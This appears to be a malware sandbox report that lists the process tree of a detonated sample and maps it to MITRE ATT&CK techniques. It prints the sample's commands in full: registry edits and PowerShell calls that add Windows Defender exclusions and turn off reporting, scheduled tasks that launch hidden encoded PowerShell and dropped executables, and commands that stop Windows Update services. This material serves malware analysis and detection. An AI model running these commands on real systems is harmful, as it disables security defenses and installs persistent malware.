        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:5672
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:5312
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:5116
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:4360
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:5792
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:3872
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:5976
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:2176
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gofkrhcTy" /SC once /ST 03:28:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:6068
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gofkrhcTy"
        7⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gofkrhcTy"
        7⤵
        
        PID:2256
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bRAVlykEFHhYYCoCeN" /SC once /ST 08:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\skeEjgTkQGILrmDhU\rRiGseojcLAzFKm\zwjqSaH.exe\" Jn /APsite_idmDu 385121 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:5360
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"
    3⤵
    PID:2460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2952
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5348
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5828
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5204
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4656
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:6032
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:6008
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2896
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5996
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6040
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6100
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3552
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1468
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"
  2⤵
  - Suspicious use of SetThreadContext
  - Creates scheduled task(s)
  PID:2704
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5140
- C:\Windows\system32\certreq.exe
  "C:\Windows\system32\certreq.exe"
  2⤵
  PID:3148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:3944

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
1⤵
- Creates scheduled task(s)
PID:4552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4780

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
- Executes dropped EXE
PID:5876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5764
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:4608

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Executes dropped EXE
PID:5816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4472 -ip 4472
1⤵
PID:1768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6036

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4624 -ip 4624
1⤵
PID:3748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery